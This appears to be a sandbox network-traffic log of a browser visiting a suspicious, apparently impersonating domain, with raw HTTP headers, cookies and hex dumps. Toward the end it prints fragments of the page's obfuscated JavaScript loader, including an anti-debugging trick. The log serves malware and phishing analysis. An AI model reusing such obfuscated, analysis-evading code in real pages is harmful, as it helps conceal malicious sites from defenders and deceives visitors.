                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:09 UTC462OUTGET /cdn-cgi/challenge-platform/h/g/rc/8cbff7d01962c33d HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:09 UTC706INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 01 Oct 2024 22:43:09 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 7
                                                                          Connection: close
                                                                          cf-chl-out: Ift8h9bhffiG4uk7g0MwCSdomfvcHeTUrhA=$YGfTgMxi+zPk/LRy
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a8T1Qd3SVcD%2F8d63OMNi7R2OF1JMH4nGl1Ai5w%2Fakfl%2FASpREMQp0YO8v4RET0xY76sqbbWDfvRn0%2BZxxm2EhL4VPoHYND0tjTkVJjFBX%2F4e9DFvSbCqIiLr6ykf3vL1CyGCgwobkIh27Zbd2X5HSV9NjMmpxPI%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff8507e6b8c71-EWR
                                                                          2024-10-01 22:43:09 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                          Data Ascii: invalid


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.64976335.190.80.14434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:10 UTC589OUTOPTIONS /report/v4?s=a8T1Qd3SVcD%2F8d63OMNi7R2OF1JMH4nGl1Ai5w%2Fakfl%2FASpREMQp0YO8v4RET0xY76sqbbWDfvRn0%2BZxxm2EhL4VPoHYND0tjTkVJjFBX%2F4e9DFvSbCqIiLr6ykf3vL1CyGCgwobkIh27Zbd2X5HSV9NjMmpxPI%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Origin: https://sanbernardinoscounty.telcom-info.com
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:43:10 UTC336INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          access-control-max-age: 86400
                                                                          access-control-allow-methods: OPTIONS, POST
                                                                          access-control-allow-origin: *
                                                                          access-control-allow-headers: content-length, content-type
                                                                          date: Tue, 01 Oct 2024 22:43:09 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.64976735.190.80.14434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:10 UTC510OUTPOST /report/v4?s=a8T1Qd3SVcD%2F8d63OMNi7R2OF1JMH4nGl1Ai5w%2Fakfl%2FASpREMQp0YO8v4RET0xY76sqbbWDfvRn0%2BZxxm2EhL4VPoHYND0tjTkVJjFBX%2F4e9DFvSbCqIiLr6ykf3vL1CyGCgwobkIh27Zbd2X5HSV9NjMmpxPI%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 456
                                                                          Content-Type: application/reports+json
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:43:10 UTC456OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 32 35 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 35 35 2e 36 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 61 6e 62 65 72 6e 61 72 64 69 6e 6f 73 63 6f
                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":1255,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.55.67","status_code":404,"type":"http.error"},"type":"network-error","url":"https://sanbernardinosco
                                                                          2024-10-01 22:43:10 UTC168INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          date: Tue, 01 Oct 2024 22:43:10 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.649770104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:11 UTC457OUTGET /em9XWWsyOWNaZkNyVjZorobotem9XWWsyOWNaZkNyVjZo HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:11 UTC731INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:11 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BSHR1qITFuBXkdQ69v3Ud%2BKDbg2BAq4uyoPObbchCUJ2MgcR1Y8Jw7Fy9Y7uBDJ3kRW7l8ze7v1IoxHOWWpV6CjDw%2FFcwK%2FoB27ai1F7fRABfGG%2FkeJcn5wj1V3bOxInd6V5sh5kR7tdNlcYMN%2BtCUwycYLemCw%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff85af9440f77-EWR
                                                                          2024-10-01 22:43:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.649769104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:11 UTC1346OUTGET / HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:12 UTC883INHTTP/1.1 302 Found
                                                                          Date: Tue, 01 Oct 2024 22:43:12 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          X-Frame-Options: DENY
                                                                          Location: ./&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzH9SH1hHMN4V9wweAxSLYUOmAR4o5uXq%2FDOTG6RzwQ%2BGFvrAlqStQzzUaXJ%2BS3sbRiVijGf5XDliK1c9%2FTRbF%2Bq5%2BnVayB%2FJMgAweoSpLC%2BKKXZQ90yylnu0iydCGP8r3YQXrmMvY7HeduPx63Ejg%2Bb%2FZF4VQk%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff85afea81768-EWR
                                                                          2024-10-01 22:43:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          34192.168.2.64976840.115.3.253443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:11 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 42 78 48 67 44 49 37 2b 70 45 4f 61 5a 41 79 68 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 36 37 64 31 36 61 64 32 37 31 65 39 37 37 0d 0a 0d 0a
                                                                          Data Ascii: CNT 1 CON 305MS-CV: BxHgDI7+pEOaZAyh.1Context: a367d16ad271e977
                                                                          2024-10-01 22:43:11 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                          2024-10-01 22:43:11 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 42 78 48 67 44 49 37 2b 70 45 4f 61 5a 41 79 68 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 36 37 64 31 36 61 64 32 37 31 65 39 37 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 49 64 52 72 6a 6e 62 75 76 56 6b 53 7a 33 56 4c 71 52 63 4c 4c 39 73 4f 38 46 6e 4c 6f 47 49 45 33 6e 52 79 66 39 34 55 4a 63 32 2f 62 65 30 75 34 6b 6d 66 30 6c 47 5a 4d 58 2b 35 59 55 48 45 78 62 4c 6f 59 6d 65 50 78 44 7a 4a 55 2b 57 34 54 42 57 68 2f 2f 56 57 72 35 71 48 67 65 6b 33 6d 57 37 6e 6a 45 34 54 6c 62 50 77
                                                                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: BxHgDI7+pEOaZAyh.2Context: a367d16ad271e977<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbIdRrjnbuvVkSz3VLqRcLL9sO8FnLoGIE3nRyf94UJc2/be0u4kmf0lGZMX+5YUHExbLoYmePxDzJU+W4TBWh//VWr5qHgek3mW7njE4TlbPw
                                                                          2024-10-01 22:43:11 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 42 78 48 67 44 49 37 2b 70 45 4f 61 5a 41 79 68 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 36 37 64 31 36 61 64 32 37 31 65 39 37 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: BxHgDI7+pEOaZAyh.3Context: a367d16ad271e977<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                          2024-10-01 22:43:11 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                          Data Ascii: 202 1 CON 58
                                                                          2024-10-01 22:43:11 UTC58INData Raw: 4d 53 2d 43 56 3a 20 53 57 6b 4f 46 32 59 52 54 6b 2b 4f 79 73 42 43 73 75 42 61 6f 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                          Data Ascii: MS-CV: SWkOF2YRTk+OysBCsuBaoA.0Payload parsing failed.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.2.649771104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:12 UTC1450OUTGET /&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8 HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:12 UTC615INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:12 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O2lII%2Bsq7F75Dpet1m%2FEHIzLgVgpv4IhHPByfg5q9dJ4bqJBr7Vre0VINdD6fh7F4XLg3EA5k4E4SfdfJ3iEVZzJHEBifSOxbU2Yv5IKE%2Bhga0ImR5xq2ni0R7CF5rjvOeJZOh6Gf9T2phxbk1SGWSFewMOax0U%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff861d91d7d02-EWR
                                                                          2024-10-01 22:43:12 UTC754INData Raw: 61 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 5f 5f 5f 2f 36 36 66 63 37 62 30 30 37 63 32 33 62 2d 62 38 36 30 64 61 38 66 66 63 38 37 64 63 35 30 32 38 36 30 65 31 62 36 34 35 63 32 32 64 32 66 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63
                                                                          Data Ascii: a86<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title></title> <script src="js___/66fc7b007c23b-b860da8ffc87dc502860e1b645c22d2f"></script> <sc
                                                                          2024-10-01 22:43:12 UTC1369INData Raw: 63 27 2c 27 61 70 70 6c 79 27 2c 27 69 6e 70 75 74 27 2c 27 73 65 6e 64 27 2c 27 36 36 39 35 32 57 54 4a 61 48 68 27 2c 27 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 27 2c 27 64 65 62 75 27 2c 27 69 6e 69 74 27 2c 27 66 6f 72 45 61 63 68 27 2c 27 65 6e 64 73 57 69 74 68 27 2c 27 47 45 54 27 2c 27 73 65 61 72 63 68 27 2c 27 63 6f 6e 73 74 72 75 63 74 6f 72 27 2c 27 31 38 36 38 31 35 4a 75 65 4e 42 73 27 2c 27 67 67 65 72 27 2c 27 63 61 6c 6c 27 2c 27 66 75 6e 63 74 69 6f 6e 5c 78 32 30 2a 5c 78 35 63 28 5c 78 32 30 2a 5c 78 35 63 29 27 2c 27 33 31 38 35 32 34 48 41 51 46 67 62 27 2c 27 6f 70 65 6e 27 2c 27 69 63 6f 6e 27 2c 27 32 30 35 33 37 30 30 61 41 72 78 62 6e 27 2c 27 74 69 74 6c 65 27 2c 27 31 32 57 4e 4e 61 4e 58 27 2c 27 31 34 30 35 39
                                                                          Data Ascii: c','apply','input','send','66952WTJaHh','onreadystatechange','debu','init','forEach','endsWith','GET','search','constructor','186815JueNBs','gger','call','function\x20*\x5c(\x20*\x5c)','318524HAQFgb','open','icon','2053700aArxbn','title','12WNNaNX','14059
                                                                          2024-10-01 22:43:12 UTC578INData Raw: 20 5f 30 78 32 37 36 39 36 33 3d 5f 30 78 32 38 65 65 63 65 5b 5f 30 78 38 35 64 66 34 61 28 30 78 31 30 61 29 5d 28 5f 30 78 32 30 32 64 64 30 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 32 38 65 65 63 65 3d 6e 75 6c 6c 2c 5f 30 78 32 37 36 39 36 33 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 34 32 38 62 32 34 3d 21 5b 5d 2c 5f 30 78 35 34 39 63 38 63 3b 7d 3b 7d 28 29 29 2c 61 30 5f 30 78 35 32 34 36 61 31 3d 61 30 5f 30 78 62 35 33 36 33 39 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 61 34 37 32 34 30 3d 61 30 5f 30 78 35 37 35 66 3b 72 65 74 75 72 6e 20 61 30 5f 30 78 35 32 34 36 61 31 5b 5f 30 78 61 34 37 32 34 30 28 30 78 31 32 34 29 5d 28 29 5b 5f 30 78 61 34 37
                                                                          Data Ascii: _0x276963=_0x28eece[_0x85df4a(0x10a)](_0x202dd0,arguments);return _0x28eece=null,_0x276963;}}:function(){};return _0x428b24=![],_0x549c8c;};}()),a0_0x5246a1=a0_0xb53639(this,function(){var _0xa47240=a0_0x575f;return a0_0x5246a1[_0xa47240(0x124)]()[_0xa47
                                                                          2024-10-01 22:43:12 UTC1369INData Raw: 61 37 31 0d 0a 28 30 78 31 30 61 29 5d 28 5f 30 78 35 38 63 62 32 65 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 33 36 38 36 32 3d 6e 75 6c 6c 2c 5f 30 78 31 37 30 30 65 65 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 63 65 33 63 65 31 3d 21 5b 5d 2c 5f 30 78 31 39 35 38 38 34 3b 7d 3b 7d 28 29 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 30 5f 30 78 32 36 34 65 34 31 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 33 39 31 66 62 62 3d 61 30 5f 30 78 35 37 35 66 2c 5f 30 78 34 33 39 36 62 61 3d 6e 65 77 20 52 65 67 45 78 70 28 5f 30 78 33 39 31 66 62 62 28 30 78 31 31 39 29 29 2c 5f 30 78 31 34 66 64 38 32 3d 6e 65 77 20 52 65 67 45 78 70 28 5f 30 78 33 39 31 66 62 62 28
                                                                          Data Ascii: a71(0x10a)](_0x58cb2e,arguments);return _0x436862=null,_0x1700ee;}}:function(){};return _0xce3ce1=![],_0x195884;};}());(function(){a0_0x264e41(this,function(){var _0x391fbb=a0_0x575f,_0x4396ba=new RegExp(_0x391fbb(0x119)),_0x14fd82=new RegExp(_0x391fbb(
                                                                          2024-10-01 22:43:12 UTC1311INData Raw: 36 30 33 65 28 30 78 31 30 34 29 29 3b 69 66 28 5f 30 78 66 37 35 31 62 64 29 7b 69 66 28 5f 30 78 34 39 31 66 34 31 3d 3d 3d 5f 30 78 35 37 36 30 33 65 28 30 78 31 30 35 29 26 26 5f 30 78 66 37 35 31 62 64 5b 5f 30 78 35 37 36 30 33 65 28 30 78 31 31 32 29 5d 28 27 2e 63 73 73 27 29 29 7b 76 61 72 20 5f 30 78 35 37 37 63 64 32 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 37 36 30 33 65 28 30 78 31 30 36 29 5d 28 5f 30 78 35 37 36 30 33 65 28 30 78 31 32 35 29 29 3b 5f 30 78 35 37 37 63 64 32 5b 5f 30 78 35 37 36 30 33 65 28 30 78 66 64 29 5d 3d 27 73 74 79 6c 65 73 68 65 65 74 27 2c 5f 30 78 35 37 37 63 64 32 5b 27 68 72 65 66 27 5d 3d 5f 30 78 66 37 35 31 62 64 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 37 36 30 33 65 28 30 78 31 30 32 29 5d 5b 5f 30 78 35
                                                                          Data Ascii: 603e(0x104));if(_0xf751bd){if(_0x491f41===_0x57603e(0x105)&&_0xf751bd[_0x57603e(0x112)]('.css')){var _0x577cd2=document[_0x57603e(0x106)](_0x57603e(0x125));_0x577cd2[_0x57603e(0xfd)]='stylesheet',_0x577cd2['href']=_0xf751bd,document[_0x57603e(0x102)][_0x5
                                                                          2024-10-01 22:43:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.2.649775104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:13 UTC1291OUTGET /js___/66fc7b007c23b-b860da8ffc87dc502860e1b645c22d2f HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
